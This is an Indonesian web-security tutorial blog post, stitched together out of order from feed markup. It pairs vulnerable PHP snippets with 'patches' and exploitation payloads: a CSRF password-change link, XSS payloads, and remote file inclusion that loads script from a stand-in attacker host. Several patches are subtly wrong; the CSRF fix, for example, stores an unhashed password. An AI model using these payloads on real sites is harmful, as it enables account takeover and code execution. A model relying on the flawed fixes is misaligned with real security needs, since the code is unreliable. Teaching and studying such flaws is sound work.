<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Kode berikut adalah mempertunjukkan sebuah halaman ganti password untuk admin, yang tidak melakukan pemeriksaan password saat ini, sehingga memungkinkan celah CSRF digunakan.</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ganti.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&lt;?php<br />
if (isset($_GET['ganti'])) {$pwd_baru = $_GET['pwd_baru'];$pwd_baru2 = $_GET['pwd_baru2'];<br />
if (($pwd_baru == $pwd_baru2)){$pwd_baru = mysql_real_escape_string($pwd_baru);$pwd_baru = md5($pwd_baru);<br />
$insert=&#8221;UPDATE `users` SET pwd = &#8216;$pwd_baru&#8217; WHERE user = &#8216;admin&#8217;;&#8221;;$result=mysql_query($insert) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
echo &#8220;&lt;pre&gt;Password Admin Berubah &lt;/pre&gt;&#8221;;mysql_close();}else{echo &#8220;&lt;pre&gt; Password tidak cocok. &lt;/pre&gt;&#8221;;}<br />
}?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun untuk memperbaikinya adalah, dengan melakukan pemeriksaan password saat ini terlebih dahulu sebelum merubah password</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ganti-patch.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&lt;?php<br />
if (isset($_GET['ganti'])) {$pwd = $_GET['pwd'];$pwd_baru = $_GET['pwd_baru'];$pwd_baru2 = $_GET['pwd_baru2'];<br />
$pwd = stripslashes( $pwd );$pwd = mysql_real_escape_string( $pwd );$pwd = md5( $pwd );<br />
// Periksa password saat ini (pwd)$qry = &#8220;SELECT pwd FROM `users` WHERE user=&#8217;admin&#8217; AND pwd=&#8217;$pwd&#8217;;&#8221;;$result = mysql_query($qry) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
if (($pwd_baru == $pwd_baru2) &amp;&amp; ( $result &amp;&amp; mysql_num_rows( $result ) == 1 )){$pwd_baru = mysql_real_escape_string($pwd_baru);$pass_new = md5($pwd_baru);<br />
$insert=&#8221;UPDATE `users` SET pwd = &#8216;$pwd_baru&#8217; WHERE user = &#8216;admin&#8217;;&#8221;;$result=mysql_query($insert) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
echo &#8220;&lt;pre&gt; Password Admin Berubah &lt;/pre&gt;&#8221;;mysql_close();}<br />
else{echo &#8220;&lt;pre&gt; Passwords Baru tidak cocok atau password lama anda salah. &lt;/pre&gt;&#8221;;}<br />
}?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8212;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Adapun cara eksploitasinya adalah melibatkan kelalaian sang admin, umumnya attacker akan mengirim link tersbut ke email, atau melalui forum dsb dengan harapan sang admin akan meng-click-nya.<br />
Code:&lt;a href=http://nice.ang.el/ganti.php?pwd=&amp;pwd_baru=dudul&amp;pwd_baru2=dudul&amp;ganti=ganti#&gt;klik saya&lt;/a&gt;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">===// Penutup \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Oke, saya harap anda semua yang membaca akan pusing, dan disinilah orang-orang terpilih akan mengikis pembaca lainnya, yup, dengan cepat anda akan segera mencoba dan mencari tahu apa yang saya tulis disini, google! sejak awal di luncurkan adalah referensi terbaik.<br />
Pelajari berbagai fungsi-fungsi yang saya singgung diatas, secara pelan dan jangan terburu-buru , selebihnya selamat datang di dunia web aplikasi yang &#8216;penuh dengan intrik-intrik, dan semoga sedikit dari saya dapat bermanfaat untuk semua. Logika anda sangat di perlukan disini!</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
===// Reference \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">[1].google.inc,</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="http://google.com" target="_self">http://google.com</a></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="http://google.com" target="_self"></a><span style="color: #000000;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">[2].OWASP, &#8220;The Open Web Application Security Project&#8221;,</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><a href="http://owasp.org"><span style="mso-bidi-font-size: 11.0pt; color: blue;">http://owasp.org</span></a></span></span></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">[3].semua web aplikasi yang telah saya lihat kode php-nya</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Copas dari</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><a href="http://ezine.echo.or.id/ezine21/e21_005.txt" target="_self"><span style="mso-bidi-font-size: 11.0pt; color: blue;">http://ezine.echo.or.id/ezine21/e21_005.txt</span></a><br />
dan diambil dari</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><a href="http://www.indonesianhacker.org/showthread.php?t=529" target="_self"><span style="mso-bidi-font-size: 11.0pt; color: blue;">sumber</span></a></span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">.<br />
Semoga bermanfaat.</span></p>
<p class="MsoNormal">
</div>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/changes400x300.jpg"></a></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/changes400x300.jpg"><img class="alignleft size-full wp-image-99" title="changes400x300" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/changes400x300.jpg" alt="" width="240" height="180" /></a>WEB SECURITY YIN-YANG</p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Ditulis oleh: gentoo,</span><span style="font-size: 10.0pt; mso-bidi-font-size: 11.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> </span><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="mailto:foobar4joo@gmail.com">foobar4joo@gmail.com</a></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="mailto:foobar4joo@gmail.com"></a><span style="color: #000000;">&#8220;If you know both yourself and your enemy, you can win a hundred battles without a single loss.&#8221;</span></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;">Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi mengenali kelemahan diri sendiri,<span id="more-98"></span> karena dengan begitu kita dapat seimbang dala, bertahan dan menyerang.  Saya harap artikel ini nantinya akan dapat menjadi referensi singkat yang membahas tentang menyerang dan bertahan dalam dunia keamanan web (web security), dan artikel ini diharapkan juga bisa menjadi titik mula bagi yang tertarik dengan keamanan web, sekaligus pembuka mata bagi para programmer web agar sedikit banyak mulai menaruh perhatian pada keamanan aplikasi yang meraka buat.  Artikel ini akan membahas beberapa jenis celah keamanan web yang umumnya selalu menjadi primadon dikalangan para pemerhati keamanan web, tetapi bahasan disini bukan mencakup detil tiap celah, tetapi lebih ke arah Proof-of-concept dari cara bertahan dan menyerang. Disajikan dengan menggunakan PHP sebagai bahasa pemrograman &#8220;dynamic&#8221;, HTML, serta mysql sebagai &#8220;database engine&#8221;.  Formatnya pun akan selalu sama, penyajian kode yang memiliki celah, cara memperkuatnya (bertahan) kemudian diikuti dengan bagaimana metode untuk mengexploitasinya. Jangan berharap artikel ini akan mengajarkan anda dari Nol, bagaimana membuat web, mengkode dengan PHP dan mysql, atau penjelasan detil (pengertian-panjang-lebar) tentang setiap celah.  Partisipasi aktif andalah yang akan menentukan apakah artikel ini akan bermanfaat buat anda nantinya</span></span></span></p>
<p class="MsoNormal" style="margin-bottom: .0001pt; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;">===// Yin-Yang \\===</span></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">====// XSS Reflected \\====<br />
kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ sweet.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . $_GET['sweet'];</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun kode untuk melindungi adalah dengan menambahkan fungsi &#8220;strip_tags&#8221; atau &#8220;htmlspecialchars&#8221; untuk memeriksa variabel tersebut terlebih dahulu.<br />
&#8212;&#8212;&#8211;\\sweet-patch.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . strip_tags($_GET['sweet']); </span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">atau PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">echo &#8216;Selamat Datang&#8217; . htmlspecialchars($_GET['sweet']);</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;<br />
Code:sweet.php?sweet=&lt;script&gt;alert(&#8220;XSS&#8221<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />&lt;/script&gt;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;">
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">====// XSS Persistent \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ sweet.php<br />
PHP Code: </span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$sweet  = trim($_POST['txtSweet']);$sweet  = mysql_real_escape_string($sweet);$query  = &#8220;INSERT INTO sweet (sweet) VALUES (&#8216;$sweet&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />;&#8221;;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun fungsi yang digunakan untuk mengamankannya adalah &#8220;stripslashes&#8221;, &#8220;addslashes&#8221;, &#8220;htmlspecialchars&#8221;<br />
&#8212;&#8212;&#8211;\\sweet-patch.php<br />
PHP Code: </span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$sweet = stripslashes($sweet);$sweet = mysql_real_escape_string($sweet);$sweet = htmlspecialchars($sweet);$query = &#8220;INSERT INTO sweet (sweet) VALUES (&#8216;$sweet&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />;&#8221;;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;">&#8212;&#8212;&#8211;//</p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;<br />
Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">sweet.php?sweet=&lt;SCRIPT SRC=http://dare.dev.il/evil.js?&lt;B&gt;Bedanya, xss exploit ini akan tersimpan ke database dan akan selalu di eksekusi setiap halaman sweet.php di load, selanjutnya tinggal keahlian anda berkreasi pada script evil.js</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
====// File Inclusion \\====</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"> Kode yang memiliki celah untuk di serang:</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\berkas.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$file = $_GET['halaman'];</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Adapun Untuk mengamankan berkas.php, cukup dengan mendefinisikan file yangingin kita include secara pasti.<br />
&#8212;&#8212;&#8211;\\berkas-patch.php<br />
PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">$file = $_GET['halaman'];</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">// hanya mengijinkan sweet.phpif ( $file != &#8220;sweet.php&#8221; ) {echo &#8220;ERROR: File not found!&#8221;;exit;}</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">|&#8212;&#8212;| Atau untuk melengkapinya, silahkan melakukan serring &#8220;Off&#8221; pada Directive| allow_url_fopen| allow_url_include| pada php.ini|&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;">Code:berkas.php?halaman=http://dare.dev.il/evil.phpSelanjutnya tergantung keahlian anda berkreasi pada script evil.php, agar berbagai perintah dalam evil.php dapat tereksekusi, ada beberapa syarat lain yang harus dipenuhi, dan ini menjadi PR anda untuk mencari tahu.</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp;amp; mso-fareast-font-family: &amp;amp;amp; mso-bidi-font-family: &amp;amp;amp; color: black; mso-fareast-language: IN;"><br />
====// SQL Injection \\====</span></p>
